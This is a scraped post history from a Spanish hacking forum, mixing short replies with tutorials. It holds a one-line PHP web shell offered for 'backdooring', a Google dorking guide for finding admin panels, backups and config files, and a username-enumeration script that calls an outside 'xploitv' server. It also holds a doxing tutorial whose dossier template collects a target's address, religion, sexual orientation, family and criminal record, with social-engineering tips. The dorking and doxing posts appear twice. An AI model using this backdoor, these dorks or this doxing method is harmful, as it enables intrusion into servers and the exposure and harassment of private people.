Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#121
Dudas y pedidos generales / Re:Vulnerabilidad en código Javascript
Junio 19, 2015, 01:40:01 AM
#122
Seguridad web y en servidores / Re:Backdooring con PHP.
Junio 14, 2015, 05:45:56 PM
Otro ejemplo:
tuarchivo.php?cmd=whoami
Código: php
tuarchivo.php?cmd=whoami
echo `{$_GET['cmd']}` #123
Pentesting / Re:PENTEST BOX: herramienta de pentesting para sistemas Windows
Junio 06, 2015, 07:24:55 PM
Muchas gracias Gabriela es muy util esto que compartes, saludos!
PD: Como dice en la pagina web
PD: Como dice en la pagina web
CitarPentestBox is not like other Penetration Testing Distributions which runs on virtual machines.
It is created because more than 50% of penetration testing distributions users uses windows.
#124
Front-end / Re:[JavaScript] Contá tu edad real (años con dígitos decimales)
Junio 05, 2015, 07:26:06 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginEstaría bueno que compartieras tu código bro para ver una manera mejor de hacer esto, espero no te lo tomes a mal solo es para que los demás aprendan, ademas a muchos les va ser muy útil y te van agradecer, repito espero no se lo tome a mal bro
10 veces por segundo es un poco exagerado, por eso lo digo.
#125
Seguridad web y en servidores / Re:Google Hacking
Mayo 30, 2015, 07:19:33 PM
claro que sep muchachito cagon #126
Pentesting / Re:[Arthusu] Mi metodologia pruebas de penetracion
Mayo 30, 2015, 12:22:04 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginAca tienes bro: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, Saludos!
Muy bueno arthusu, la verdad es que sirve de bastante y estaré esperando ese Google Hacking post
Saludos
PD: no soy bueno agregando imagenes me he dado cuenta con el tiempo XD je!
#127
Seguridad web y en servidores / Google Hacking
Mayo 30, 2015, 12:20:37 PMIntroduccion
Buenas, en esta entrada trataré de explicar acerca de Google Hacking para usarlo en nuestras pruebas de penetracion o recoleccion de informacion en cualquier cosa que nos sirva, ya que con Google es solo saber utilizar de manera adecuada los operadores/directivas.
Tambien les puede interesar las siguientes entradas:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Informacion que nos interesa
En el caso de estar recolectando informacion sobre una pagina puede haber demasiadas cosas que nos interesarian saber, entre las cuales se encuentran:
* El lenguaje que usa la pagina web
* El sitema operativo del servidor web
* El software del sistema operativo del servidor
* La version del software del servidor
* Si el sitio web tiene Plugins
* Si el sitio web tiene CMS popular
* Que tipos de archivos contiene mas que otros
* La base de datos que utiliza
* Los subdominios que tiene
La mayoria de la informacion que nos puede interesar puede venir de vulnerabilidades, tales como:
* Errores en la web o servidor
* Directorios que sabemos que pueden incluir informacion sensible
* Archivos que incluyen contraseñas
* Firewalls web
Una de las paginas que incluye mucha informacion sobre dorks de google para poder realizar nuestras busquedas es: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Busquedas especificas
Para realizar busquedas especificas de lo que queramos encontrar en google utilizaremos los famosos "operadores" que incluye para referirse a cierto tipo de cosas. Comentare de manera rapida los usos de cada uno:
- Con este signo menos excluimos algunos resultados.
+ Con este operador + podemos incluir varias busquedas en los resultados.
~ Con esta tilde se buscan sinonimos de la palabra que le asignes.
* Se utiliza el asterisco como comodin de palabras extra.
" Podemos usar las comillas dobles para buscar una palabra exacta que este entre ellas.
OR (|) Puedes buscar almenos una de varias palabras
site: Obtiene resultados de sitios o dominios que le asignes.
link: Busca paginas externas que contienen enlaces del sitio que le asignes.
related: Busca sitios web relacionados al que le asignes.
info: Obtiene informacion sobre el sitio o dominio que le asignes.
cache: Comprueba como era la pagina o direccion que le asignes la ultima vez que google lo visito.
intitle: Con este operador buscamos en el titulo de la pagina entre las etiquetas <title>
inurl: Con este operador buscamos que la url incluya lo que le asigamos en la busqueda.
define: Este operador se utiliza para definir un termino de la palabra que le asignes.
filetype/ext: Con estos operadores buscamos un archivo por su extension o tipo de archivo.
intext: Incluye terminos que esten en el <body> de la pagina.
insubject: Incluye terminos que esten en el las etiquetas de titulo de la pagina.
inanchor: Incluye terminos que tengan la etiqueta <a> dentro del <body> de la pagina web.
Google ignora algunas palabras
Google ignora varias palabras como son "a", "el", "de" ... que muchas veces solo harian la busqueda mas pesada por lo que es recomendable no utilizarlas cuando intentemos encontrar informacion. Y podemos hacer busquedas inteligentes en lugar de escribir "me duele la cabeza" podriamos escribir "dolor de cabeza" con lo cual encontrariamos mejores resultados.
Buscar lo mas comun o mas afectado
Lo mejor para encontrar cosas es irnos a buscar lo mas comun o mas afectado en cualquier tipo de aplicacion web.
Mensajes de error: Failed to open stream, access denied, fatal error, division by zero, warning, error, include, ORA-xxxx, database error, error ocurred, error online, cannot modified header, a syntax error, the page cannot be found, internet information services, error diagnostic information, etc.
Mensajes HTTP: 200 OK, 300 Multiple choices, 301 Moved permanently, 302 Found, 304 Not Modified, 307 Temporary Redirect, 400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found, 500 Internal server error, 501 Not implemented, 503 Service unavailable, 550 Permission denied, etc. Puedes ver una lista mas completa aqui: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Servidores web: ISS, Apache, Apache Tomcat, Nginx, Lighttpd, Jigsaw, Klone, Abys web server, Oracle web tier, x5 web server, zeus web server, IBM HTTP server, LiteSpeed web server, etc. Puedes ver una lista mas completa aqui: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login: Wordpress,joomla, drupal, prestashop, tynicms, etc.
Busquedas comunes para vulnerabilidades
Hay muchos dorks, los dorks son de manera sencilla una simple cadena de caracteres con los operadores anteriores la cual nos arroja un resultado deseado, tal como "tarjetas de creditos", "contraseñas de usuarios", "paginas phishing", etc.
Vamos a ver algunas de las tecnicas que yo utilizo muy comunmente para encontrar algunas cosas en algun sitio web:
Crawling:
Con esto puedes ver todo lo que ha indexado google del sitio web que buscas.
site:tudominio.com
Pagina de administracion:
Podemos encontrar paginas de administracion utilizando. Algunos de los operadores y palabras comunes.
site:dominio.com intext:admin OR intext:administrator
site:dominio.com inurl:admin OR inurl:administrator
Subdominios:
site:dominioprincipal.com -site:www.dominioprincipal.com
site:dominioprincipal.com -site:www.dominioprincipal.com -site:www.subdominio1.principal.com
Extensiones:
site:dominio.com ext:pdf | ext:log | ext:txt | ext:bak
Algunas extesiones: pdf, xls, rar, zip , tar.gz, htm, php, bak, sql, csv, txt, log, conf
Archivos phpinfo, robots, o backups:
site:.net intitle:phpinfo() inurl:info.php
inurl:"robots.txt" intext:"disallow:"
intext:config ext:bak intitle:"index of"
Acceso a directorios:
intitle:"index of"
site:tusitio.com intitle:"index of"
Errores: Los errores son muy comunes en cualquier sitio web o servidor:
Crea tu propio DORK
Para crear un dork solo necesitamos utilizar los operadores ya conocidos anteriormente. Muchos usuarios intentan con cosas comunes que ven o simplemente encuentran una vulnerabilidad en un CMS no muy conocidos y le pasan operadores para encontrarla.
Anteriormente puse algunos dorks que no vi en ningun lugar solo se me ocurrio utilizar los operadores por que podrian ser utiles para encontrar informacion, por ejemplo... una manera de encontrar un poco mas rapido la informacion seria utilizar el tip recomendado en la entrada que les recomende al inicio:
^inurl:"e-vendo.php?shop="
Otras formas de Google Hacking:
Google Hacking Imagenes:
Bueno esto no es algo nuevo pero podriamos utilizar la busqueda avanzada que nos proporciona google: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
O tambien intentar buscar la imagen deseada utilizando el mismo buscador de imagenes, ya sea subiendo la imagen o pegando la URL, podriamos encontrar cosas interesantes de la empresa o persona relacionada a la pagina web.
Google Hacking Mapas:
Esto tampoco es nuevo pero con los mapas de google: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Nos es muy facil encontrar informacion sobre donde se encuentra la empresa o persona relacionada con la pagina web.
Bueno y hasta aqui este "tutorial" si se le puede llamar asi, no es nada de otro mundo, pueden ver muchos ejemplos en la pagina exploit-db la cual contiene muchos ejemplos para usar estos operadores, espero que a mas de uno le sea de utilidad y si encontrado lo que buscaban genial!
Buenas, en esta entrada trataré de explicar acerca de Google Hacking para usarlo en nuestras pruebas de penetracion o recoleccion de informacion en cualquier cosa que nos sirva, ya que con Google es solo saber utilizar de manera adecuada los operadores/directivas.
Tambien les puede interesar las siguientes entradas:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Informacion que nos interesa
En el caso de estar recolectando informacion sobre una pagina puede haber demasiadas cosas que nos interesarian saber, entre las cuales se encuentran:
* El lenguaje que usa la pagina web
* El sitema operativo del servidor web
* El software del sistema operativo del servidor
* La version del software del servidor
* Si el sitio web tiene Plugins
* Si el sitio web tiene CMS popular
* Que tipos de archivos contiene mas que otros
* La base de datos que utiliza
* Los subdominios que tiene
La mayoria de la informacion que nos puede interesar puede venir de vulnerabilidades, tales como:
* Errores en la web o servidor
* Directorios que sabemos que pueden incluir informacion sensible
* Archivos que incluyen contraseñas
* Firewalls web
Una de las paginas que incluye mucha informacion sobre dorks de google para poder realizar nuestras busquedas es: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Busquedas especificas
Para realizar busquedas especificas de lo que queramos encontrar en google utilizaremos los famosos "operadores" que incluye para referirse a cierto tipo de cosas. Comentare de manera rapida los usos de cada uno:
- Con este signo menos excluimos algunos resultados.
+ Con este operador + podemos incluir varias busquedas en los resultados.
~ Con esta tilde se buscan sinonimos de la palabra que le asignes.
* Se utiliza el asterisco como comodin de palabras extra.
" Podemos usar las comillas dobles para buscar una palabra exacta que este entre ellas.
OR (|) Puedes buscar almenos una de varias palabras
site: Obtiene resultados de sitios o dominios que le asignes.
link: Busca paginas externas que contienen enlaces del sitio que le asignes.
related: Busca sitios web relacionados al que le asignes.
info: Obtiene informacion sobre el sitio o dominio que le asignes.
cache: Comprueba como era la pagina o direccion que le asignes la ultima vez que google lo visito.
intitle: Con este operador buscamos en el titulo de la pagina entre las etiquetas <title>
inurl: Con este operador buscamos que la url incluya lo que le asigamos en la busqueda.
define: Este operador se utiliza para definir un termino de la palabra que le asignes.
filetype/ext: Con estos operadores buscamos un archivo por su extension o tipo de archivo.
intext: Incluye terminos que esten en el <body> de la pagina.
insubject: Incluye terminos que esten en el las etiquetas de titulo de la pagina.
inanchor: Incluye terminos que tengan la etiqueta <a> dentro del <body> de la pagina web.
Google ignora algunas palabras
Google ignora varias palabras como son "a", "el", "de" ... que muchas veces solo harian la busqueda mas pesada por lo que es recomendable no utilizarlas cuando intentemos encontrar informacion. Y podemos hacer busquedas inteligentes en lugar de escribir "me duele la cabeza" podriamos escribir "dolor de cabeza" con lo cual encontrariamos mejores resultados.
Buscar lo mas comun o mas afectado
Lo mejor para encontrar cosas es irnos a buscar lo mas comun o mas afectado en cualquier tipo de aplicacion web.
Mensajes de error: Failed to open stream, access denied, fatal error, division by zero, warning, error, include, ORA-xxxx, database error, error ocurred, error online, cannot modified header, a syntax error, the page cannot be found, internet information services, error diagnostic information, etc.
Mensajes HTTP: 200 OK, 300 Multiple choices, 301 Moved permanently, 302 Found, 304 Not Modified, 307 Temporary Redirect, 400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found, 500 Internal server error, 501 Not implemented, 503 Service unavailable, 550 Permission denied, etc. Puedes ver una lista mas completa aqui: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Servidores web: ISS, Apache, Apache Tomcat, Nginx, Lighttpd, Jigsaw, Klone, Abys web server, Oracle web tier, x5 web server, zeus web server, IBM HTTP server, LiteSpeed web server, etc. Puedes ver una lista mas completa aqui: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login: Wordpress,joomla, drupal, prestashop, tynicms, etc.
Busquedas comunes para vulnerabilidades
Hay muchos dorks, los dorks son de manera sencilla una simple cadena de caracteres con los operadores anteriores la cual nos arroja un resultado deseado, tal como "tarjetas de creditos", "contraseñas de usuarios", "paginas phishing", etc.
Vamos a ver algunas de las tecnicas que yo utilizo muy comunmente para encontrar algunas cosas en algun sitio web:
Crawling:
Con esto puedes ver todo lo que ha indexado google del sitio web que buscas.
site:tudominio.com
Pagina de administracion:
Podemos encontrar paginas de administracion utilizando. Algunos de los operadores y palabras comunes.
site:dominio.com intext:admin OR intext:administrator
site:dominio.com inurl:admin OR inurl:administrator
Subdominios:
site:dominioprincipal.com -site:www.dominioprincipal.com
site:dominioprincipal.com -site:www.dominioprincipal.com -site:www.subdominio1.principal.com
Extensiones:
site:dominio.com ext:pdf | ext:log | ext:txt | ext:bak
Algunas extesiones: pdf, xls, rar, zip , tar.gz, htm, php, bak, sql, csv, txt, log, conf
Archivos phpinfo, robots, o backups:
site:.net intitle:phpinfo() inurl:info.php
inurl:"robots.txt" intext:"disallow:"
intext:config ext:bak intitle:"index of"
Acceso a directorios:
intitle:"index of"
site:tusitio.com intitle:"index of"
Errores: Los errores son muy comunes en cualquier sitio web o servidor:
Crea tu propio DORK
Para crear un dork solo necesitamos utilizar los operadores ya conocidos anteriormente. Muchos usuarios intentan con cosas comunes que ven o simplemente encuentran una vulnerabilidad en un CMS no muy conocidos y le pasan operadores para encontrarla.
Anteriormente puse algunos dorks que no vi en ningun lugar solo se me ocurrio utilizar los operadores por que podrian ser utiles para encontrar informacion, por ejemplo... una manera de encontrar un poco mas rapido la informacion seria utilizar el tip recomendado en la entrada que les recomende al inicio:
^inurl:"e-vendo.php?shop="
Otras formas de Google Hacking:
Google Hacking Imagenes:
Bueno esto no es algo nuevo pero podriamos utilizar la busqueda avanzada que nos proporciona google: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
O tambien intentar buscar la imagen deseada utilizando el mismo buscador de imagenes, ya sea subiendo la imagen o pegando la URL, podriamos encontrar cosas interesantes de la empresa o persona relacionada a la pagina web.
Google Hacking Mapas:
Esto tampoco es nuevo pero con los mapas de google: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Nos es muy facil encontrar informacion sobre donde se encuentra la empresa o persona relacionada con la pagina web.
Bueno y hasta aqui este "tutorial" si se le puede llamar asi, no es nada de otro mundo, pueden ver muchos ejemplos en la pagina exploit-db la cual contiene muchos ejemplos para usar estos operadores, espero que a mas de uno le sea de utilidad y si encontrado lo que buscaban genial!
#128
Back-end / Re:Mostrando la ubicación de una dirección IP en un mapa en tan solo tres líneas.
Mayo 30, 2015, 02:42:39 AM
Muy bueno polsaker +1, ya conocia esa pagina, tambien habia una base de datos con ips de latitude y longitude: You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login gracias a @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login el me lo comento hace un tiempo, saludos!
#129
Bugs y Exploits / Re:Entendiendo y explotando XXE (External XML Entities)
Mayo 30, 2015, 02:36:46 AM
Buen post te dejo +1 
#130
Hardware y Reparaciones / Re:Bajale la temperatura a tu placa de video con un cooler
Mayo 28, 2015, 09:23:21 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginLa cual esta mas cara que la pasta termica blanca la cual es para ese proposito XDDYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
una buena pasta térmica puede bajar hasta en un 10% la temperatura de tu sistema sin hacer más modificaciones.
¡Siempre nos quedará la Nutella!
#131
Dudas y pedidos generales / Re:Quien me recomienda algo parecido ReverseDNS?
Mayo 28, 2015, 09:21:49 PM
Lo que dice @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login y en version de pago esta You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login, saludos!
#132
Hacking / Re:Nadie sabe para quien trabaja!
Mayo 26, 2015, 11:08:11 PM
Se que es algo tonto pero a eso le puedes hacer fuerza bruta demasiado facil y seria mas eficiente que google:
finder_usernames.html
Código: php
usernames.php
Código: php
y para leerlos:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
o usar el servicio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
donde c es el numero de usuarios
Saludos!
finder_usernames.html
<script type="text/javascript" src="jQuery/js/jquery-2.1.4.min.js"></script>
<script type="text/javascript">
$("document").ready(function(){
$("#submit").click(function(e){
e.preventDefault();
var list_users = $("#usernames").val().split("\n");
$.each(list_users,function(index,username){
//console.log(username+ "\n");
$.get(
'usernames.php',
{usernames : username},
function(data) {
$('.resultados').append(username + ":" + data + '<br />');
},
"text"
);
});
});
});
</script>
<form action="" method="post">
<textarea cols="50" rows="20" id="usernames" name="usernames"></textarea>
<input type="submit" id="submit" value="Exploit Usernames" />
</form>
<p class="resultados"></p>usernames.php
<?php
if(isset($_GET['usernames'])){
echo file_get_contents("http://server5.lincehost.net/~neek/xploitv/script2.php?db={$_GET['usernames']}&action=count");
}
?>
y para leerlos:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
o usar el servicio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
donde c es el numero de usuarios
Saludos!
#133
Front-end / Re:[SOURCE] Reset CSS
Mayo 26, 2015, 09:44:04 PM
Buen post bro, tambien hay una buena forma de realizar tus plantillas utilizando la base: You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login con la cual ya viene con varias cosas que pueden ser utiles en el diseño web, solo resta crear el codigo, pondre un enlace donde explico de que trata mas o menos si lo consideran spam pueden eliminarlo: You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login, saludos espero que te sea util
#134
Bugs y Exploits / Re:Engañando al WAF con XMP
Mayo 26, 2015, 08:42:27 PM
Excelente aporte yo tambien te dejo +1
#135
Noticias Informáticas / Re:Pendrive USB-bomba casero quema una PC nada más al conectarlo
Mayo 26, 2015, 08:36:01 PM #136
Hacking / [Doxing] Encontrar informacion de personas
Mayo 25, 2015, 09:40:24 PMEl otra vez estaba en el IRC chateando, entro un usuario y pregunto sobre el tema de "investigar personas" muchos usuarios le dañaron la autoestima como es normal . Bueno pero ahora vengo hablarles sobre Doxing el cual se define como:
¿Que es Doxing?
Doxing (dox es una abreviacion de "documentos") es un proceso para obtener informacion personal de un objetivo siendo casi siempre una persona, en este tipo de documentos podemos obtener mucha documentacion sobre la persona tal como puede ser: nombre real, sexo, sitio web, alias, email, perfil de redes sociales, direccion, ip, etc. Este tipo de tecnicas entran dentro de la ingieneria social.
Hay muchas herramientas ya sea online o de escritorio las cuales te permiten automatizar este tipo de proceso, y la mejor forma de realizar esto es las conexiones que realices al buscar tu objetivo. Encontrar un nombre de usuario lleva a encontrar el nombre completo y esto puede conducir a la direccion fisica. El usuario puede llevar alguna fotografia lo cual puede resultar en dar su direccion o placas. Para nombres comunes como Cesar se le pueden agregar los intereses o localizacion para encontrar mas rapido lo buscado, es por esto tambien que muchas personas no confian en otras por internet debido a la informacion que se puede encontrar puede ser muchas veces un golpe bajo.
Otro tipo de ejemplo puede ser: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Obteniendo informacion de un objetivo
Aqui depende mas que nada del tipo de informacion que tengas con que empezar, ya sea el alias, el email, la direccion fisica, etc. Como comentabamos mas arriba un dox es una abreviacion de documento entonces por lo menos deberiamos tener el siguiente formato de documentacion el cual nos puede ser de utilidad:
Por busqueda general usamos Google.
www.google.com
Podemos usar los famosos dorks para encontrar informacion, algunos ejemplos de utilidad pueden ser:
inurl: especificas el sitio donde deseas buscar a la persona.
alias inurl:www.elsitio.com
alias inurl:www.facebook.com
intitle: especifica que tenga en el titulo de cualquier pagina lo que le indiques.
alias intitle:bienvenido
intext: especficia que tenga en el cuerpo de la pagina lo que le indiques.
alias intext:juakear
Otro sitio de busqueda pueden ser:
www.bing.com
www.duckduckgo.com
Sitios webs recomendados para busqueda de informacion:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
http://checkusernames.com
Ingieneria social
Como habiamos comentado arriba el proceso del doxing esta muy ligado a la ing. social por lo cual puedes agregar el email del usuario o en las redes sociales, para obtener los datos deseados, como dijo kevin mitnick:
* Todos queremos ayudar.
* El primer movimiento es siempre de confianza hacia el otro.
* No nos gusta decir No.
* A todos nos gusta que nos alaben.
Puedes comenzar desde ahi tus cimientos. Quizas te interese:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Formas de defenderse
Las recomendaciones para defenderse son:
* Intenta cambiar tu nickname cierto tiempo
* Intenta usar canales seguros (Proxys, VPNS, TOR)
* Para chatear por canales seguros (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)
* Cifrar tus mensajes (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)
Como recomendacion haste un doxing a ti mismo, e intenta borrar todos los rastros que puedas encontrar.
* No dejar datos en redes sociales.
* Uso de correos temporales
* No usar datos reales
* No confiar (Esta no se aplica a todos, pero mucha gente que no sabes en cual confiar)
Espero que esta mini-introduccion sobre doxing les sea de utilidad a mas de alguno. Si tienen algunas tools o tecnicas que puedan compartir no olviden dejar sus comentarios.
. Bueno pero ahora vengo hablarles sobre Doxing el cual se define como:¿Que es Doxing?
Doxing (dox es una abreviacion de "documentos") es un proceso para obtener informacion personal de un objetivo siendo casi siempre una persona, en este tipo de documentos podemos obtener mucha documentacion sobre la persona tal como puede ser: nombre real, sexo, sitio web, alias, email, perfil de redes sociales, direccion, ip, etc. Este tipo de tecnicas entran dentro de la ingieneria social.
Hay muchas herramientas ya sea online o de escritorio las cuales te permiten automatizar este tipo de proceso, y la mejor forma de realizar esto es las conexiones que realices al buscar tu objetivo. Encontrar un nombre de usuario lleva a encontrar el nombre completo y esto puede conducir a la direccion fisica. El usuario puede llevar alguna fotografia lo cual puede resultar en dar su direccion o placas. Para nombres comunes como Cesar se le pueden agregar los intereses o localizacion para encontrar mas rapido lo buscado, es por esto tambien que muchas personas no confian en otras por internet debido a la informacion que se puede encontrar puede ser muchas veces un golpe bajo.
Otro tipo de ejemplo puede ser: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Obteniendo informacion de un objetivo
Aqui depende mas que nada del tipo de informacion que tengas con que empezar, ya sea el alias, el email, la direccion fisica, etc. Como comentabamos mas arriba un dox es una abreviacion de documento entonces por lo menos deberiamos tener el siguiente formato de documentacion el cual nos puede ser de utilidad:
CitarNombre de usuario/ Sobrenombre:
Nombre real:
Localizacion:
Nacionalidad:
Imagenes:
Videos:
Religion:
Orientacion Sexual:
Numero movil/telefono:
Direccion IP:
Sitios webs hackeados:
Paginas de redes sociales:
Foros en los que postea:
Miembros de su familia:
Ocupacion:
Registro criminal:
Informacion extra:
Por busqueda general usamos Google.
www.google.com
Podemos usar los famosos dorks para encontrar informacion, algunos ejemplos de utilidad pueden ser:
inurl: especificas el sitio donde deseas buscar a la persona.
alias inurl:www.elsitio.com
alias inurl:www.facebook.com
intitle: especifica que tenga en el titulo de cualquier pagina lo que le indiques.
alias intitle:bienvenido
intext: especficia que tenga en el cuerpo de la pagina lo que le indiques.
alias intext:juakear
Otro sitio de busqueda pueden ser:
www.bing.com
www.duckduckgo.com
Sitios webs recomendados para busqueda de informacion:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
http://checkusernames.com
Ingieneria social
Como habiamos comentado arriba el proceso del doxing esta muy ligado a la ing. social por lo cual puedes agregar el email del usuario o en las redes sociales, para obtener los datos deseados, como dijo kevin mitnick:
* Todos queremos ayudar.
* El primer movimiento es siempre de confianza hacia el otro.
* No nos gusta decir No.
* A todos nos gusta que nos alaben.
Puedes comenzar desde ahi tus cimientos. Quizas te interese:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Formas de defenderse
Las recomendaciones para defenderse son:
* Intenta cambiar tu nickname cierto tiempo
* Intenta usar canales seguros (Proxys, VPNS, TOR)
* Para chatear por canales seguros (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)
* Cifrar tus mensajes (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login)
Como recomendacion haste un doxing a ti mismo, e intenta borrar todos los rastros que puedas encontrar.
* No dejar datos en redes sociales.
* Uso de correos temporales
* No usar datos reales
* No confiar (Esta no se aplica a todos, pero mucha gente que no sabes en cual confiar)
Espero que esta mini-introduccion sobre doxing les sea de utilidad a mas de alguno. Si tienen algunas tools o tecnicas que puedan compartir no olviden dejar sus comentarios.
#137
Hardware y Reparaciones / Re:[Procesos] PC/Laptop - Lista de procesos para reparación/mantenimiento
Mayo 20, 2015, 02:52:04 PM
##################################################
# Teclado o mouse no funcionan correctamente PC/LAPTOP #
##################################################
Les mostrare la lista de procesos para diagnosticar cuando un teclado o mouse en caso de la pc o de la laptop no funcionan correctamente:
PC:
1.- Drivers o sistema (verificar que los drivers existan y funcionen correctamente, bootear un sistema operativo como hirents boot para verificar que el sistema no de problemas)
2.- Esta mal conectado o mouse o teclado defectuoso (probar en diferentes conexiones o verificar que este bien conectado)
